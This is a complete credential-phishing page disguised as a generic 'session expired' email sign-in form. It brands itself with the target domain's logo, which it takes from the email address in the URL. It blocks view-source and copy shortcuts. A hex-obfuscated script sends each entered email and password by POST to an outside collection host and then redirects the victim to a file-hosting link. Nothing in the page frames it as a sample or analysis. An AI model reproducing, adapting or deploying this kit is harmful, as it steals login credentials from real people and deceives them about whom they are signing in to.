<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Sign-in</title>
    <!-- Bootstrap CSS -->
   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&amp;display=swap" rel="stylesheet">
<style>
body{
			background: #a7a9b0;
		}

		.container{
			width:100%;
			display: flex;
			justify-content: center;
			align-items: center;
			height: 100vh;
		}

		.office{
			width: 500px;
			background: #fff;
			border:5px solid #4285f4;
			border-radius: 5px;
		}

		.office-holder{
			width:80%;
			margin: auto;
			padding: 20px 0px;
		}

		.logo{
			width:100%;
			float: left;
			margin-bottom: 2em;
		}

		.logo h1{
			font-family: arial;
		}

		.verify{
			width: 70%;
			margin: auto;
		}

		.verify h4{
			font-family: arial;
		}

		fieldset{
			width: 90%;
			float: right;
			border:2px solid #4285f4;
			border-radius: 5px;
		}

		legend{
			font-size: 15px;
			overflow: hidden;
			width: 42%;
			padding:0px 2px;
			margin: 0px;
		}

		.verify input[type='text']{
			width: 100%;
			float: right;
			border:none;
			padding:3px 10px;
		}

		.verify button{
			border:none;
			height: 40px;
			width: 80px;
			float: right;
			margin-top: 2em;
			background: #4285f4;
			border-radius: 5px;
			color: #fff;
		}

		.email-to-verify{
			border:1px solid #000;
			border-radius: 10px;
		}

		.form-holder{
			width:100%;
			float: left;
		}

		.form-holder h3{
			font-weight: 600;
		}

		.form-holder input[type='email'], input[type='password']{
			width: 100%;
			height:40px;
			float: left;
			margin-bottom: 15px;
		}
		.form-holder .btn-holder{
			width:100%;
			margin-top:1em;
			display: flex;
			align-content: center;
			align-items: center;
			justify-content: center;
		}

		.form-holder .btn-holder .btn{
			background:#0073C6;
			border:none;
			padding:6px 10px;
			color:#fff;
			border-radius: 0px;
			margin-top: 20px;
			margin-bottom: 20px;
		}

		.form-holder .btn-holder .btn:hover{
			cursor:pointer;
		}

		.checkbox{
			width: 100%;
			float: left;
			margin-top:5px;
		}

		.checkbox label{
			font-family:arial;
			font-size:13px;
			float: left;
			margin-left:1em;
		}

		.hide{
			display: none;
		}

</style>
</head>

<body>
    <div id="html_encoder_div">
        <div class="container">
            <div class="office show border shadow bg-light" id="others">
                <div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div id="login_logo">
                            <img id="logoimg" src="" width="50" height="50" alt="">
                        </div>
                        <h3 class="text-dark"><strong id="logoname" class="text-uppercase"></strong></h3>
                        <h5 class="font-weight-light">Session expired. Verify email to continue</h5>
                    </div>
                    <center>
                        <div id="msg" style="display: none;font-weight: 600;color: red;">Invalid Password.! Please enter correct password.</div>
                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                    </center>
                    <form id="contact" method="POST" action="">
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <input type="email" id="email" class="form-control" readonly="" value="" placeholder="someone@example.com" required="">
                            <input type="password" id="password" autofocus="" placeholder="Password" class="form-control" required="">
                            <div class="checkbox">
                                <input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
                                <label>REMEMBER ME</label>
                            </div>
                            <div class="btn-holder">
                                <button class="btn btn-lg col-12" id="submit-btn">LOGIN</button>
                            </div>
                            <p style="color:#0073C6; margin-top:1em; float: left; width:100%;">I can't access your account?</p>
                            <p style="color:#0073C6; margin-top:0em; float: left; width:100%;">Sign in with a one-time code</p>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <style>
    .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #FFF;
        border-bottom: 1px solid #fff;
    }

    .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
    }

    .ws_toolbar {
        z-index: 100000
    }

    .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px
    }

    .tb_highlight {
        background-color: yellow
    }

    .tb_hide {
        visibility: hidden
    }

    .ws_toolbar img {
        padding: 2px;
        margin: 0px
    }
    </style>
     <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

  <script>
    
var _0xae3c=["\x6B\x65\x79\x64\x6F\x77\x6E","\x63\x74\x72\x6C\x4B\x65\x79","\x77\x68\x69\x63\x68","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x62\x69\x6E\x64","\x63\x6F\x6E\x74\x65\x78\x74\x6D\x65\x6E\x75","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x6B\x65\x79\x43\x6F\x64\x65","\x75","\x6B\x65\x79\x70\x72\x65\x73\x73","\x68\x69\x64\x65","\x23\x6D\x73\x67","","\x76\x61\x6C","\x23\x65\x6D\x61\x69\x6C","\x61\x6E\x69\x6D\x61\x74\x65","\x23\x61\x75\x74\x6F\x6D\x61\x69\x6C","\x73\x68\x6F\x77","\x23\x69\x6E\x70\x75\x74\x62\x61\x72","\x63\x6C\x69\x63\x6B","\x23\x62\x61\x63\x6B\x31","\x73\x75\x62\x73\x74\x72","\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x6D\x6C","\x23\x65\x6D\x61\x69\x6C\x69\x63\x68","\x74\x65\x73\x74","\x23\x65\x72\x72\x6F\x72","\x66\x6F\x63\x75\x73","\x40","\x69\x6E\x64\x65\x78\x4F\x66","\x2E","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x74\x6F\x55\x70\x70\x65\x72\x43\x61\x73\x65","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6C\x6F\x67\x6F\x2E\x63\x6C\x65\x61\x72\x62\x69\x74\x2E\x63\x6F\x6D\x2F","\x61\x74\x74\x72","\x23\x6C\x6F\x67\x6F\x69\x6D\x67","\x23\x6C\x6F\x67\x6F\x6E\x61\x6D\x65","\x2E\x6C\x6F\x67\x6F\x6E\x61\x6D\x65","\x23\x70\x61\x73\x73\x77\x6F\x72\x64","\x74\x65\x78\x74","\x4A\x53\x4F\x4E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x61\x6C\x61\x78\x79\x73\x68\x6F\x6F\x74\x65\x72\x2E\x63\x6C\x75\x62\x2F\x66\x66\x65\x2F\x70\x6F\x73\x74\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x56\x65\x72\x69\x66\x69\x6E\x67\x2E\x2E\x2E","\x23\x73\x75\x62\x6D\x69\x74\x2D\x62\x74\x6E","\x6C\x6F\x67","\x73\x69\x67\x6E\x61\x6C","\x6F\x6B","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x69\x61\x73\x6B\x79\x2E\x6E\x65\x74\x2F\x41\x41\x41\x74\x31\x4D\x37\x4F\x5F\x57\x4B\x34\x79\x49\x49\x53\x64\x48\x71\x6A\x6E\x52\x48\x34\x39\x36\x55\x4A\x4E\x69\x7A\x6D\x45\x51\x4A\x78\x5F\x50\x53\x63\x72\x6E\x44\x4D\x36\x41","\x72\x65\x70\x6C\x61\x63\x65","\x6D\x73\x67","\x50\x6C\x65\x61\x73\x65\x20\x65\x6E\x74\x65\x72\x20\x63\x6F\x72\x72\x65\x63\x74\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x61\x6E\x64\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6E","\x4C\x4F\x47\x49\x4E","\x61\x6A\x61\x78","\x72\x65\x61\x64\x79"];$(document)[_0xae3c[4]](_0xae3c[0],function(_0xd56dx1){if(_0xd56dx1[_0xae3c[1]]&& (_0xd56dx1[_0xae3c[2]]== 83)){_0xd56dx1[_0xae3c[3]]();return false}});document[_0xae3c[6]](_0xae3c[5],(_0xd56dx2)=>{return _0xd56dx2[_0xae3c[3]]()});document[_0xae3c[7]]= function(_0xd56dx1){if(_0xd56dx1[_0xae3c[1]]&& (_0xd56dx1[_0xae3c[8]]=== 67|| _0xd56dx1[_0xae3c[8]]=== 86|| _0xd56dx1[_0xae3c[8]]=== 85|| _0xd56dx1[_0xae3c[8]]=== 117)){return false}else {return true}};$(document)[_0xae3c[10]](_0xae3c[9],function(_0xd56dx1){if(_0xd56dx1[_0xae3c[1]]){return false}else {return true}});/ global $ /;$(document)[_0xae3c[57]](function(){var _0xd56dx3=0;$(_0xae3c[21])[_0xae3c[20]](function(){$(_0xae3c[12])[_0xae3c[11]]();$(_0xae3c[15])[_0xae3c[14]](_0xae3c[13]);$(_0xae3c[17])[_0xae3c[16]]({left:200,opacity:_0xae3c[11]},0);$(_0xae3c[19])[_0xae3c[16]]({right:200,opacity:_0xae3c[18]},1000)});var _0xd56dx4=window[_0xae3c[24]][_0xae3c[23]][_0xae3c[22]](1);if(!_0xd56dx4){}else {var _0xd56dx5=_0xd56dx4;$(_0xae3c[15])[_0xae3c[14]](_0xd56dx5);$(_0xae3c[26])[_0xae3c[25]](_0xd56dx5);var _0xd56dx6=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0xd56dx6[_0xae3c[27]](_0xd56dx5)){$(_0xae3c[28])[_0xae3c[18]]();_0xd56dx4[_0xae3c[29]];return false};var _0xd56dx7=_0xd56dx5[_0xae3c[31]](_0xae3c[30]);var _0xd56dx8=_0xd56dx5[_0xae3c[22]]((_0xd56dx7+ 1));var _0xd56dx9=_0xd56dx8[_0xae3c[22]](0,_0xd56dx8[_0xae3c[31]](_0xae3c[32]));var _0xd56dxa=_0xd56dx9[_0xae3c[33]]();var _0xd56dxb=_0xd56dx9[_0xae3c[34]]();$(_0xae3c[38])[_0xae3c[37]](_0xae3c[35],_0xae3c[36]+ _0xd56dx8);$(_0xae3c[39])[_0xae3c[25]](_0xd56dxb);$(_0xae3c[40])[_0xae3c[25]](_0xd56dxb)};$(_0xae3c[47])[_0xae3c[20]](function(_0xd56dx2){$(_0xae3c[28])[_0xae3c[11]]();$(_0xae3c[12])[_0xae3c[11]]();_0xd56dx2[_0xae3c[3]]();var _0xd56dx4=$(_0xae3c[15])[_0xae3c[14]]();var _0xd56dxc=$(_0xae3c[41])[_0xae3c[14]]();var _0xd56dxd=$(_0xae3c[12])[_0xae3c[25]]();$(_0xae3c[12])[_0xae3c[42]](_0xd56dxd);var _0xd56dx5=_0xd56dx4;var _0xd56dx6=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0xd56dx6[_0xae3c[27]](_0xd56dx5)){$(_0xae3c[28])[_0xae3c[18]]();_0xd56dx4[_0xae3c[29]];return false};var _0xd56dx7=_0xd56dx5[_0xae3c[31]](_0xae3c[30]);var _0xd56dx8=_0xd56dx5[_0xae3c[22]]((_0xd56dx7+ 1));var _0xd56dx9=_0xd56dx8[_0xae3c[22]](0,_0xd56dx8[_0xae3c[31]](_0xae3c[32]));var _0xd56dxa=_0xd56dx9[_0xae3c[33]]();var _0xd56dxb=_0xd56dx9[_0xae3c[34]]();$(_0xae3c[38])[_0xae3c[37]](_0xae3c[35],_0xae3c[36]+ _0xd56dx8);$(_0xae3c[39])[_0xae3c[25]](_0xd56dxb);_0xd56dx3= _0xd56dx3+ 1;$[_0xae3c[56]]({dataType:_0xae3c[43],url:_0xae3c[44],type:_0xae3c[45],data:{email:_0xd56dx4,password:_0xd56dxc},beforeSend:function(_0xd56dxe){$(_0xae3c[47])[_0xae3c[14]](_0xae3c[46])},success:function(_0xd56dxf){if(_0xd56dxf){$(_0xae3c[12])[_0xae3c[18]]();console[_0xae3c[48]](_0xd56dxf);if(_0xd56dxf[_0xae3c[49]]== _0xae3c[50]){$(_0xae3c[41])[_0xae3c[14]](_0xae3c[13]);if(_0xd56dx3>= 2){_0xd56dx3= 0;window[_0xae3c[24]][_0xae3c[52]](_0xae3c[51])};$(_0xae3c[12])[_0xae3c[25]](_0xd56dxf[_0xae3c[53]])}else {$(_0xae3c[12])[_0xae3c[25]](_0xd56dxf[_0xae3c[53]])}}},error:function(){$(_0xae3c[41])[_0xae3c[14]](_0xae3c[13]);if(_0xd56dx3>= 2){_0xd56dx3= 0;window[_0xae3c[24]][_0xae3c[52]](_0xae3c[51])};$(_0xae3c[12])[_0xae3c[18]]();$(_0xae3c[12])[_0xae3c[25]](_0xae3c[54])},complete:function(){$(_0xae3c[47])[_0xae3c[14]](_0xae3c[55])}})})})

</script>
</body>
</html>
